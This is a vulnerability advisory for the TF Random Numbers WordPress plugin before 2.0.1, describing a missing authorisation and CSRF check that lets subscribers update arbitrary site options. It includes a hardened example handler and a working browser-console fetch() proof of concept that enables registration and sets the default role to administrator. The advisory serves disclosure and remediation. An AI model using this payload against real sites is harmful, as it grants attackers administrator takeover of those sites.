WordPress Plugin Vulnerabilities

TF Random Numbers < 2.0.1 - Subscriber+ Arbitrary Option Update

Description

The plugin does not perform authorisation or CSRF checks in an AJAX action, and does not ensure that the options to be updated belong to the plugin. As a result, any authenticated user, such as a subscriber, can update arbitrary blog options, for example enabling registration and setting the default role to administrator.
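For reference, this is what a correctly guarded version of such an AJAX handler looks like. It is an added example, not the TF Random Numbers plugin's own code; the handler name, nonce name and option names are assumptions. It addresses the three defects the description names: a nonce check (CSRF), a capability check (authorisation), and an allowlist so only the plugin's own option keys can be written.

```php
<?php
// Added illustrative example: a hardened wp_ajax handler for the action
// named in the advisory. Not the plugin's code; the function name, nonce
// name and option names below are assumptions.

add_action( 'wp_ajax_tf_numb_save_licenses', 'example_tf_save_licenses' );

function example_tf_save_licenses() {
    // 1. CSRF: require a nonce bound to this action (nonce name assumed).
    //    Dies with a 403 if the nonce is missing or invalid.
    check_ajax_referer( 'example_tf_save_licenses', 'nonce' );

    // 2. Authorisation: only users who may manage options proceed.
    //    A subscriber fails this check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Allowlist: only the plugin's own option keys may be updated.
    //    Requests naming users_can_register or default_role are dropped.
    $allowed = array(
        'example_tf_license_addon_0', // assumed plugin option name
        'example_tf_license_addon_1', // assumed plugin option name
    );

    $data  = ( isset( $_POST['data'] ) && is_array( $_POST['data'] ) )
        ? wp_unslash( $_POST['data'] )
        : array();
    $saved = array();

    foreach ( $data as $entry ) {
        $key = isset( $entry['key'] ) ? sanitize_key( $entry['key'] ) : '';
        if ( ! in_array( $key, $allowed, true ) ) {
            continue; // anything outside the plugin's namespace is ignored
        }
        $val = isset( $entry['val'] ) ? sanitize_text_field( $entry['val'] ) : '';
        update_option( $key, $val );
        $saved[] = $key;
    }

    wp_send_json_success( array( 'saved' => $saved ) );
}
```

The front end then has to include the nonce in each request (for example by passing wp_create_nonce( 'example_tf_save_licenses' ) to the script with wp_localize_script and sending it as the nonce field). Of the three checks, the allowlist is the one that removes the privilege-escalation path entirely: even if the other two were bypassed, core options such as users_can_register and default_role would remain untouchable through this handler.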

Proof of Concept

Sign in as a subscriber and run the following code in the web console

fetch( 'admin-ajax.php', {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: 'action=tf_numb_save_licenses&data[addon_0][key]=users_can_register&data[addon_0][val]=1&data[addon_1][key]=default_role&data[addon_1][val]=administrator'
} );

Log out and register a new account; it will be created with the administrator role.

Affects Plugins

References

Classification

Type
NO AUTHORISATION
CWE
CVSS

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes

Timeline

Publicly Published
2023-03-27 (about 1 year ago)
Added
2023-03-27 (about 1 year ago)
Last Updated
2023-03-27 (about 1 year ago)

Other